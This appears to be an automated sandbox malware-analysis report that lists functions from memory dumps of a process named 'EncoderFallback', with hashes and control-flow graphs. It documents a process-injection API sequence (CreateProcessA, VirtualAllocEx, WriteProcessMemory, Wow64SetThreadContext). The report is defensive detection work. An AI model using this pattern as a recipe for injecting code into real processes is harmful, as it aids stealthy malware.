                                                                                          Function 05D215B8 Relevance: .3, Instructions: 311COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b50488c970f5d7800f0aa584f99d480f9a1518526f134c12d064ff58dd56ce63
                                                                                          • Instruction ID: f65e8ab3a4c2305dfeaa260528d679ca2152d9e036447f4b80027019eaf03505
                                                                                          • Opcode Fuzzy Hash: b50488c970f5d7800f0aa584f99d480f9a1518526f134c12d064ff58dd56ce63
                                                                                          • Instruction Fuzzy Hash: 00E1F574E05228CFDB54DFA9DA84B9DBBF2FB49309F2090AAD049A7355DB305A85CF01
                                                                                          Function 05D23700 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 5d23700-5d2374a 7 5d2374d call 5d36d30 0->7 8 5d2374d call 5d36d29 0->8 2 5d2374f-5d2375c 3 5d23762-5d23763 2->3 4 5d231a1-5d231c4 2->4 6 5d23cb9-5d23cd1 3->6 4->6 7->2 8->2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %$/
                                                                                          • API String ID: 0-2617147878
                                                                                          • Opcode ID: b48c4b5bf4ca9b77831b6b9d862f3524689c0f3a92cb67330fb1d6e3ef14e766
                                                                                          • Instruction ID: 4e1e7bd973d6ecb3b977bdcb9359b389fdc334ace7291b98ce3e6a776e1bf7ee
                                                                                          • Opcode Fuzzy Hash: b48c4b5bf4ca9b77831b6b9d862f3524689c0f3a92cb67330fb1d6e3ef14e766
                                                                                          • Instruction Fuzzy Hash: F711C278E052698FCB61CF64DD84BEDBBB2BB49318F0484EAD809A7214C7315AC5CF00
                                                                                          Function 05D36505 Relevance: 1.7, APIs: 1, Instructions: 206processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 294 5d36505-5d36580 297 5d36582-5d3658c 294->297 298 5d365b9-5d365d9 294->298 297->298 299 5d3658e-5d36590 297->299 303 5d36612-5d3664c 298->303 304 5d365db-5d365e5 298->304 301 5d365b3-5d365b6 299->301 302 5d36592-5d3659c 299->302 301->298 305 5d365a0-5d365af 302->305 306 5d3659e 302->306 314 5d36685-5d366fa CreateProcessA 303->314 315 5d3664e-5d36658 303->315 304->303 308 5d365e7-5d365e9 304->308 305->305 307 5d365b1 305->307 306->305 307->301 309 5d365eb-5d365f5 308->309 310 5d3660c-5d3660f 308->310 312 5d365f7 309->312 313 5d365f9-5d36608 309->313 310->303 312->313 313->313 317 5d3660a 313->317 325 5d36703-5d3674b 314->325 326 5d366fc-5d36702 314->326 315->314 316 5d3665a-5d3665c 315->316 318 5d3667f-5d36682 316->318 319 5d3665e-5d36668 316->319 317->310 318->314 321 5d3666a 319->321 322 5d3666c-5d3667b 319->322 321->322 322->322 323 5d3667d 322->323 323->318 331 5d3675b-5d3675f 325->331 332 5d3674d-5d36751 325->332 326->325 334 5d36761-5d36765 331->334 335 5d3676f-5d36773 331->335 332->331 333 5d36753 332->333 333->331 334->335 336 5d36767 334->336 337 5d36783 335->337 338 5d36775-5d36779 335->338 336->335 340 5d36784 337->340 338->337 339 5d3677b 338->339 339->337 340->340
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05D366EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: fd8f8a58ffac40393df75516baab4ee86e50de9b2031b74616661f770190998c
                                                                                          • Instruction ID: a743a9ca0faddaff2b20bdedbeb101b6d0ffa34731df539eec35574e4bd79e14
                                                                                          • Opcode Fuzzy Hash: fd8f8a58ffac40393df75516baab4ee86e50de9b2031b74616661f770190998c
                                                                                          • Instruction Fuzzy Hash: 5B8116B1D10659AFDB10CFA9C9867EDBBF2BF48310F14852AE855A7284D7749881CB81
                                                                                          Function 05D36510 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 341 5d36510-5d36580 343 5d36582-5d3658c 341->343 344 5d365b9-5d365d9 341->344 343->344 345 5d3658e-5d36590 343->345 349 5d36612-5d3664c 344->349 350 5d365db-5d365e5 344->350 347 5d365b3-5d365b6 345->347 348 5d36592-5d3659c 345->348 347->344 351 5d365a0-5d365af 348->351 352 5d3659e 348->352 360 5d36685-5d366fa CreateProcessA 349->360 361 5d3664e-5d36658 349->361 350->349 354 5d365e7-5d365e9 350->354 351->351 353 5d365b1 351->353 352->351 353->347 355 5d365eb-5d365f5 354->355 356 5d3660c-5d3660f 354->356 358 5d365f7 355->358 359 5d365f9-5d36608 355->359 356->349 358->359 359->359 363 5d3660a 359->363 371 5d36703-5d3674b 360->371 372 5d366fc-5d36702 360->372 361->360 362 5d3665a-5d3665c 361->362 364 5d3667f-5d36682 362->364 365 5d3665e-5d36668 362->365 363->356 364->360 367 5d3666a 365->367 368 5d3666c-5d3667b 365->368 367->368 368->368 369 5d3667d 368->369 369->364 377 5d3675b-5d3675f 371->377 378 5d3674d-5d36751 371->378 372->371 380 5d36761-5d36765 377->380 381 5d3676f-5d36773 377->381 378->377 379 5d36753 378->379 379->377 380->381 382 5d36767 380->382 383 5d36783 381->383 384 5d36775-5d36779 381->384 382->381 386 5d36784 383->386 384->383 385 5d3677b 384->385 385->383 386->386
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05D366EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 85dd8bbb912c728ed8254aa1ecd785cd5c24e1e965d3ee21b52f0696830b8db3
                                                                                          • Instruction ID: ac5bbdb134378ff7a170fed482701a8ef429a432504208e106260a5aa58e82be
                                                                                          • Opcode Fuzzy Hash: 85dd8bbb912c728ed8254aa1ecd785cd5c24e1e965d3ee21b52f0696830b8db3
                                                                                          • Instruction Fuzzy Hash: 318116B1D10759AFDB10CFA9C9867ADBBF2FF48310F14852AE855A7284D7749881CB81
                                                                                          Function 05D36D29 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 387 5d36d29-5d36d7e 390 5d36d80-5d36d8c 387->390 391 5d36d8e-5d36dcd WriteProcessMemory 387->391 390->391 393 5d36dd6-5d36e06 391->393 394 5d36dcf-5d36dd5 391->394 394->393
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D36DC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 3e900f0c658ee745e7707da7aaa93a97d9474c59e759e1f4d7894f6ad81251dc
                                                                                          • Instruction ID: 07e79d90837c5a9c66b56db66c07b3635ea6b34f5961d60db9ad60094477d8c9
                                                                                          • Opcode Fuzzy Hash: 3e900f0c658ee745e7707da7aaa93a97d9474c59e759e1f4d7894f6ad81251dc
                                                                                          • Instruction Fuzzy Hash: 97214471900359AFDB10DFAAC885BDEBBF5FF88310F14842AE919A7340C7789954CBA5
                                                                                          Function 05D36D30 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 398 5d36d30-5d36d7e 400 5d36d80-5d36d8c 398->400 401 5d36d8e-5d36dcd WriteProcessMemory 398->401 400->401 403 5d36dd6-5d36e06 401->403 404 5d36dcf-5d36dd5 401->404 404->403
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D36DC0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: a0922d53eda8de28fe838868323f0f609e9a436cce032526b7ef2cbf9522f93a
                                                                                          • Instruction ID: 518545a65800edee7d33d7638f28d2f551f57923fe29b04329ffb70392e1ee94
                                                                                          • Opcode Fuzzy Hash: a0922d53eda8de28fe838868323f0f609e9a436cce032526b7ef2cbf9522f93a
                                                                                          • Instruction Fuzzy Hash: DE212471900359AFDB10DFAAC885BDEBBF5FF48310F10842AE919A7340C7789954CBA5
                                                                                          Function 05D36808 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 408 5d36808-5d3685b 411 5d3686b-5d3689b Wow64SetThreadContext 408->411 412 5d3685d-5d36869 408->412 414 5d368a4-5d368d4 411->414 415 5d3689d-5d368a3 411->415 412->411 415->414
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05D3688E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: e09c9892b89a1e6dff83e37f6214a6302df09a1322ae5d3e8aa5a96a4d3df6ad
                                                                                          • Instruction ID: d0862cdc69c11f52208a7715025e00c4750aa8fcc7ba464ebc1d57a257828978
                                                                                          • Opcode Fuzzy Hash: e09c9892b89a1e6dff83e37f6214a6302df09a1322ae5d3e8aa5a96a4d3df6ad
                                                                                          • Instruction Fuzzy Hash: D22139719003099FDB10DFAAC4867EEBBF4AF48214F14842AD519A7240CB789545CFA5
                                                                                          Function 05D36810 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 435 5d36810-5d3685b 437 5d3686b-5d3689b Wow64SetThreadContext 435->437 438 5d3685d-5d36869 435->438 440 5d368a4-5d368d4 437->440 441 5d3689d-5d368a3 437->441 438->437 441->440
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05D3688E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: ab2ddda88b114b0ad09e3a8c36bd332b794ef7c4b43f9c9b5a97ed5eae91d3ed
                                                                                          • Instruction ID: aa0f9cea6d0e0bdc560a59855599bf7a2686f5b55b3f714269cde9110ae674bd
                                                                                          • Opcode Fuzzy Hash: ab2ddda88b114b0ad09e3a8c36bd332b794ef7c4b43f9c9b5a97ed5eae91d3ed
                                                                                          • Instruction Fuzzy Hash: C2211571D003099FDB10DFAAC4857AEBBF4BF88314F14842AD519A7240DB78A945CFA5
                                                                                          Function 05D37118 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 445 5d37118-5d371a1 VirtualProtect 449 5d371a3-5d371a9 445->449 450 5d371aa-5d371da 445->450 449->450
                                                                                          APIs
                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 05D37194
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 0a54b34a03c571e48dad4799158151ed33c7dc2f18ec62f277787e67cf0e7c92
                                                                                          • Instruction ID: 77677364f21cc541524999084b811fb43ad659a79a223573601dbf1a74bfc367
                                                                                          • Opcode Fuzzy Hash: 0a54b34a03c571e48dad4799158151ed33c7dc2f18ec62f277787e67cf0e7c92
                                                                                          • Instruction Fuzzy Hash: 442138719007499FDB10DFAAC841BEEBBF5FF88320F14842AD519A7240D7389945CFA5
                                                                                          Function 05D32108 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 454 5d32108-5d3218c SleepEx 458 5d32195-5d321ba 454->458 459 5d3218e-5d32194 454->459 459->458
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 6fc13fe96b3b2bd3dd40e7416806e64158188376f19a96e339b3f867f30605e0
                                                                                          • Instruction ID: 0183d7334fede846c6bf7c338175525d2f90ba46188c97f8a767c0943ad21ce4
                                                                                          • Opcode Fuzzy Hash: 6fc13fe96b3b2bd3dd40e7416806e64158188376f19a96e339b3f867f30605e0
                                                                                          • Instruction Fuzzy Hash: 20118975D003499FDB20CFAAC845BEFBFF8AF88310F14841AD555A7240CB399944CBA5
                                                                                          Function 05D37120 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 463 5d37120-5d371a1 VirtualProtect 466 5d371a3-5d371a9 463->466 467 5d371aa-5d371da 463->467 466->467
                                                                                          APIs
                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 05D37194
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 8edf10bb79dd5c6ab5836a695a09b357fdcbc4503dac7ca26707b6d159b14811
                                                                                          • Instruction ID: f98fa3d5d6ff5075a9ae46375378895e8bdeec64a3974f5544d872f60e7a5966
                                                                                          • Opcode Fuzzy Hash: 8edf10bb79dd5c6ab5836a695a09b357fdcbc4503dac7ca26707b6d159b14811
                                                                                          • Instruction Fuzzy Hash: 962115719007499FDB10DFAAC881BAEBBF4FF88320F14842AD519A7240D7789545CFA5
                                                                                          Function 05D36C28 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 471 5d36c28-5d36cab VirtualAllocEx 475 5d36cb4-5d36cd9 471->475 476 5d36cad-5d36cb3 471->476 476->475
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D36C9E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: b33453fd6655912fe66aff96552404be1cb2b80e54ca0f783d5cdc50a4b00c12
                                                                                          • Instruction ID: 451860ba9d1346ed9d1c0703094d762e5bdde9c451115e51158438d1feaac379
                                                                                          • Opcode Fuzzy Hash: b33453fd6655912fe66aff96552404be1cb2b80e54ca0f783d5cdc50a4b00c12
                                                                                          • Instruction Fuzzy Hash: B7114472900349AFDB10DFAAC845BDEBBF5EF88320F14841AE519A7250C779A540CBA5
                                                                                          Function 05D32110 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 1209f7f6cbee3e208e19873b8ba89a7ad239dfeb5942bb10c64dea8ce9c4d481
                                                                                          • Instruction ID: a089431f5eed264f5b37c4afd56a7d31184780934df655bc3bf03556e74a8bb5
                                                                                          • Opcode Fuzzy Hash: 1209f7f6cbee3e208e19873b8ba89a7ad239dfeb5942bb10c64dea8ce9c4d481
                                                                                          • Instruction Fuzzy Hash: 6D115BB1D003499FDB10DFAAC8457EFFBF8AF88710F14841AD555A7240CB399944CBA5
                                                                                          Function 05D36C30 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D36C9E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 02e90c80a1c5acba13026c7555a5d0cf83b250e3f119cdb95494b283cb35cd58
                                                                                          • Instruction ID: 0b494d9545be167f6e4d0bc261a94315ab5347b18c8ad57067cb22f19bac1a40
                                                                                          • Opcode Fuzzy Hash: 02e90c80a1c5acba13026c7555a5d0cf83b250e3f119cdb95494b283cb35cd58
                                                                                          • Instruction Fuzzy Hash: FB1156719003499FDF10CFAAC845BDEBBF5EF88310F10841AE515A7250C7799500CBA5
                                                                                          Function 05D23023 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (
                                                                                          • API String ID: 0-3887548279
                                                                                          • Opcode ID: 9dd1c69a5c8ad4aeda0b4319236bc642d77f7db5d4e9d0911effb18c76f1e857
                                                                                          • Instruction ID: eddc259fa290bc95fef09d5f8129f89681e5979e75a339585cf070515b5153d4
                                                                                          • Opcode Fuzzy Hash: 9dd1c69a5c8ad4aeda0b4319236bc642d77f7db5d4e9d0911effb18c76f1e857
                                                                                          • Instruction Fuzzy Hash: 7521D0B8E042288FDB61DF64C944BEDBBB2FB4D318F1481EAD549A7245CB319A95CF10
                                                                                          Function 073879B4 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2
                                                                                          • API String ID: 0-450215437
                                                                                          • Opcode ID: 95c21ef337691cf9faeb46e2c1fa5242121cfd28fb8570dd32fa8c0ec784cab9
                                                                                          • Instruction ID: db51caf2f9ab60027a3b6227c9a2f864285860a380c0b34cf4d632223b75c19f
                                                                                          • Opcode Fuzzy Hash: 95c21ef337691cf9faeb46e2c1fa5242121cfd28fb8570dd32fa8c0ec784cab9
                                                                                          • Instruction Fuzzy Hash: 1A019EB0905129CFEBA59F28D98979AB7B4FF45310F1050E6C418AB606DB314EC4CF92
                                                                                          Function 05D22E0A Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *
                                                                                          • API String ID: 0-163128923
                                                                                          • Opcode ID: 32aaa3e0659f558086bcf7935c46d2c5f465549c643f4fe6fb6edc55b7a07f21
                                                                                          • Instruction ID: 0410a7e8cc8388f17154aa1bb8d71481da3a7c14a4d2ef9add1a097ee74c1ff0
                                                                                          • Opcode Fuzzy Hash: 32aaa3e0659f558086bcf7935c46d2c5f465549c643f4fe6fb6edc55b7a07f21
                                                                                          • Instruction Fuzzy Hash: 0301AAB4A04228DFDB64DF64CE91BDCBBB1AB59300F1080DAA949B7244CAB16E81CF40
                                                                                          Function 05D22F11 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *
                                                                                          • API String ID: 0-163128923
                                                                                          • Opcode ID: 038fb875fb55b366baaac5467ea2f0ef450b02284c8a89cabac9fc64f0674f63
                                                                                          • Instruction ID: a97b2fb62b739b809b0579a21db707901d1c6ec67ae3db6d208c625cab12a3fd
                                                                                          • Opcode Fuzzy Hash: 038fb875fb55b366baaac5467ea2f0ef450b02284c8a89cabac9fc64f0674f63
                                                                                          • Instruction Fuzzy Hash: 2C019D78A04228DFDB60CF54CD94BD8BBB1BB29308F14819AE54DA7244DBB15EC5CF40
                                                                                          Function 05D236E3 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: H
                                                                                          • API String ID: 0-2852464175
                                                                                          • Opcode ID: 7162dafdd539c4fd031661844b4cb93e23ebaf993aa0964698d976a714080c3f
                                                                                          • Instruction ID: 8a575b048dff9769f79b807e36254a1388f6bb8bb8b97e0b81302133840b5531
                                                                                          • Opcode Fuzzy Hash: 7162dafdd539c4fd031661844b4cb93e23ebaf993aa0964698d976a714080c3f
                                                                                          • Instruction Fuzzy Hash: 85F0C974904229CFCB64CF54CA84BADB7F6BB58308F0485DAD50DA7241D7759E85CF10
                                                                                          Function 05D2349F Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: E
                                                                                          • API String ID: 0-3568589458
                                                                                          • Opcode ID: 0c6ab3d0b1a5e34dd13fbf877835dfb070ec2c24d06488fd239ec63bd3c6d97c
                                                                                          • Instruction ID: 8f7a570456a55b4e95797b11b3d7fbc0338e9889fb1df412d2d9372b9b17bc80
                                                                                          • Opcode Fuzzy Hash: 0c6ab3d0b1a5e34dd13fbf877835dfb070ec2c24d06488fd239ec63bd3c6d97c
                                                                                          • Instruction Fuzzy Hash: FDE0BD78808268CFCB21DF20D948BD8BBB2BB18345F0481E6840DA3295C7758A85CF00
                                                                                          Function 0123EEC0 Relevance: .4, Instructions: 354COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bef65bfe6ab3d1632725d6246684b9bcb573d3c16d8a1da8fcce5ebef5308772
                                                                                          • Instruction ID: aed27b7fda0ad896f6c618f59d89b065265694c8566f58321063f600b32b197a
                                                                                          • Opcode Fuzzy Hash: bef65bfe6ab3d1632725d6246684b9bcb573d3c16d8a1da8fcce5ebef5308772
                                                                                          • Instruction Fuzzy Hash: 93C1F5327046158FEB15DF79E850AAE7BA6EFC5210B15807AEA05CB391CB35DC06C7A2
                                                                                          Function 05D20A77 Relevance: .3, Instructions: 267COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ecc30153eb80ce31fb2210b2cac44025993dd69c8fd2814b75433c7210e4e705
                                                                                          • Instruction ID: 5d93d9d38d5d2fb1c6735c45285c671ab1b8820f3482fc13deebaf4e8db6bf02
                                                                                          • Opcode Fuzzy Hash: ecc30153eb80ce31fb2210b2cac44025993dd69c8fd2814b75433c7210e4e705
                                                                                          • Instruction Fuzzy Hash: 5AC1E274E00228CFDB64EFA8DA45B9EBBB2FB49314F1090AAD559B7655DB305E81CF00
                                                                                          Function 0123F790 Relevance: .2, Instructions: 208COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
